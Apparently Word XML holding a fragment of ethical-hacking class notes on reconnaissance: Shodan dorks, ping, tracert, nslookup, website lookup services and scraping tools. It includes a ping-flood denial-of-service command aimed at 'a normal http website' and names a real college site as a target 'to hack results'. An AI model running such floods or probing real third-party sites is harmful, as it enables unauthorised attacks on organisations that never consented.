        <w:t>If we need login page of satellite-linked devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000017E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vsat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000017F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000180" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>If we want to search for windows machines which are accessible through internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000181" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Os:windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00000182" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000183" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000184" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">For useful </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shodan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dorks, we have dorks by JAKEJARVIS from GITHUB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000185" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000186" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>16-09-2021, THURSDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000187" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000188" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>C. SYSTEM BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000189" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">CMD - PING, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000018A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000018B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">PING </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000018C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Packet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>INternet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Groper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000018D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000018E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">TTL - Time </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Live</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000018F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the time period for which the packet which goes out of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> computer will be alive. after this time period the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>packetr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>self destruct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000190" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000191" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Output types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000192" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. ping google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000193" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Reply from 142.250.199.46: bytes=32 time=59ms TTL=115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000194" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Destination is available and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> replying you back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000195" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000196" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. ping google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000197" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>request timed out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000198" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Destination </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or domain name is not available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000199" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000019A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>3. ping google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000019B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Destination host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unreachble</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000019C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Destination </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or domain name is available, but blocking </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> request because of firewall, ids, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ips</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000019D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000019E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Normal Operation of ping command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000019F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ping</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001A0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- there will be 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>icmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> echo request which will sent from your computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001A1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>INcase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> if the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>desztination</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is available, we get 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>icmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> echo replies back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001A2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Length of the packet 32 / 64 / 128 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001A3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Number of packets sent and received - 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001A4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001A5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">DOS - Denial of service </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001A6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001A7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>ping -l 64000 -n 100000 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001A8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>and this can be used to check if your target has a firewall or not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001A9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001AA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>if firewall is present, the output will be as follows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001AB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>request timed out</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001AC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">destination </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> unreachable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001AD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001AE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>if firewall is not present, the output will be as follows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001AF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Reply from 142.250.199.46: bytes=32 time=59ms TTL=115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001B0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Reply from 142.250.199.46: bytes=32 time=59ms TTL=115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001B1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Reply from 142.250.199.46: bytes=32 time=59ms TTL=115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001B2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Reply from 142.250.199.46: bytes=32 time=59ms TTL=115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001B3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Reply from 142.250.199.46: bytes=32 time=59ms TTL=115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001B4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001B5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>ctrl + c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001B6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001B7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>try this to a normal http website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001B8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001B9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001BA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TRACERT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001BB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Used to trace the path taken by your packet till it reaches the destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001BC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tracert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001BD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001BE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001BF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>NSLOOKUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001C0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Used to get DNS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detrails</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> about any domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001C1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001C2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="000001C3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>&gt;google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001C4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001C5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001C6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Authoritative answer (is the reply given by the primary </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server, we </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>wont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> see this in the output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001C7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001C8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Non - Authoritative answer (is the reply given by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>secondarty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server, we can see this in the output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001C9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001CA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001CB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001CC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001CD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001CE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>D. WEBSITE BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001CF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Choose your target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001D0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- College website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001D1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Normal website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001D2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> go for bigger website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001D3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001D4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>target - snsct.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001D5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001D6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Basic Website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001D7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001D8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">used to search details about a domain name or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000001D9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001DA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Archive.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001DB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Used to look at older version of website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001DC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001DD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001DE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Technical Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001DF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- builtwith.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001E0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- sitereport.netcraft.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001E1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- dnsqueries.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001E2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- mxtoolbox.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001E3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- centralops.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001E4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- robtex.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001E5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001E6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Advanced details - used for subdomain enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001E7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- virustotal.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001E8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- dnsdumpster.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001E9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA" w:rsidP="005433E6"/>
    <w:p w14:paraId="000001EA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001EB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>objective - to hack results of snsct.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001EC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001ED" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>server banner grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001EE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>server version disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001EF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001F0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001F1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>E. BROWSER ADD ON BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001F2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001F3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Browser extensions / addons - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wappalyzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pagexray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whatruns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000001F4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000001F5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>F. SOFTWARE BASED INF GATHERING - Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001F6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">HTTRACK </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- Website </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mirrioring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001F7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">You can download single page / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of a website or u can download the entire website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000001F8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Web Data Extractor - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>USed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to extract email id, phone numbers, fax from a website</w:t>
      </w:r>
    </w:p>
